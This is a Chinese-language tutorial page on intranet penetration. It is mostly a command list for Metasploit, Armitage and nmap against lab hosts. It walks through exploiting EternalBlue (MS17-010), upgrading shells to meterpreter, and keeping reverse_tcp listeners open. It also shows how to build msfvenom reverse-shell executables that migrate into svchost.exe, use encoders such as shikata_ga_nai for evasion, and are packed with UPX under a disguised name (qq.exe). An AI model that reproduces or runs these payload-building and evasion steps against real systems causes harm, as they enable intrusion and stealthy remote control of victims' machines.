您好,登录后才能下订单哦!
本篇内容主要讲解“如何解决内网渗透问题”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何解决内网渗透问题”吧!
python -c "import pty;pty.spawn('/bin/bash');" 会话提升
session -u 4 将shell会话提升成meterpreter会话
直接修改payload,原来的设置的payload为shell的木马也能连上
apt-get install armitage 安装
armitage 进入界面
不用改直接进入
选择快速查询
输入要查询的地址
nmap出来存活的主机有(1是物理电脑,2是网关,135是linux靶机,254是广播地址,128是win7靶机,129是本机)
拒绝访问打开服务管理器
用所有的漏洞进行探测
搜索ms17
移过去
存在永恒之蓝的漏洞
进行渗透
渗透成功
handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp |
show advanced 显示高级参数设置
set ExitOnSession false 监听到shell之后端口继续监听
set SessionCommunicationTimeout 0 设置会话存活时间,默认5分钟
set SessionExpirationTimeout 0 设置会话存活时间,默认一星期
EnableStageEncoding 是否允许stage进行编码
StageEncoder 设置要用的编码
优秀的编码:x86/shikata_ga_nai、cmd/powershell_base64
加壳
upx -9 qq.exe -1压缩更快 -9压缩更好 -d解压 -l列表压缩文件 -t测试压缩文件 -V显示版本号 -h给予更多帮助 -L显示软件许可证 |
测试压缩文件能否运行
upx -t qq.com OK表示可以运行 |
回到顶部
(会在运行木马的时候自动迁移到svchost.exe的对应进程中去)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe |
回
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe |
到此,相信大家对“如何解决内网渗透问题”有了更深的了解,不妨来实际操作一番吧!这里是亿速云网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。